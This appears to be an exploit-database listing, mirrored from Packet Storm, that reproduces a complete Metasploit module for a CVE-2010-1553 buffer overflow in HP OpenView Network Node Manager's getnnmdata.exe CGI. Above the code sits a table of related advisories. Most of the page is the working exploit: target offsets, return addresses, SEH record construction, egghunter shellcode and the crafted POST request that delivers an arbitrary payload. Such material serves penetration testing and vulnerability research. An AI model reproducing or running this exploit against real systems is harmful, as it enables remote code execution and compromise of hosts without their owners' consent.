HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow

🗓️ 24 Mar 2011 00:00:00Reported by MCType

packetstorm🔗 packetstormsecurity.com👁 29 Views

HP OpenView Network Node Manager buffer overflow in getnnmdata.exe CG

Reporter	Title	Published	Views	Family All 27
0day.today	HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Code Execution	2 Jul 201000:00	–	zdt
0day.today	HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI BOF	25 Mar 201100:00	–	zdt
Circl	CVE-2010-1553	2 Jul 201000:00	–	circl
Check Point Advisories	HP OpenView NNM getnnmdata.exe CGI MaxAge Parameter Buffer Overflow (CVE-2010-1553)	22 Jul 201000:00	–	checkpoint_advisories
CVE	CVE-2010-1553	13 May 201017:00	–	cve
Cvelist	CVE-2010-1553	13 May 201017:00	–	cvelist
d2	DSquare Exploit Pack: D2SEC_HPNNM5	13 May 201017:30	–	d2
Exploit DB	HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution	2 Jul 201000:00	–	exploitdb
Exploit DB	HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit)	24 Mar 201100:00	–	exploitdb
exploitpack	HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution	2 Jul 201000:00	–	exploitpack

`##  
# $Id: hp_nnm_getnnmdata_maxage.rb 12117 2011-03-23 21:57:16Z mc $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',  
'Description' => %q{  
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.  
By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,  
an attacker may be able to execute arbitrary code.  
},  
'Author' => [ 'MC' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12117 $',  
'References' =>  
[  
[ 'CVE', '2010-1553' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 750,  
'BadChars' => "\x00",  
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",  
'DisableNops' => 'True',  
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ECX',  
},  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],  
[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'May 11 2010'))  
  
register_options( [ Opt::RPORT(80) ], self.class )  
end  
  
def exploit  
  
egg = rand_text_alpha_upper(4)  
  
hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"  
hunter << "\xef\xb8" + egg + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
boom = rand_text_alpha_upper(target['Offset'])  
boom << generate_seh_record(target.ret)  
boom << hunter + egg + egg  
boom << payload.encoded  
boom << rand_text_alpha_upper(9024 - payload.encoded.length)  
  
sploit = "SnmpVals=&MaxAge=#{boom}"  
  
print_status("Trying target #{target.name}...")  
  
send_request_cgi({  
'uri' => '/OvCgi/getnnmdata.exe',  
'method' => 'POST',  
'data' => sploit  
}, 8)  
  
handler  
  
end  
  
end  
`

24 Mar 2011 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.83929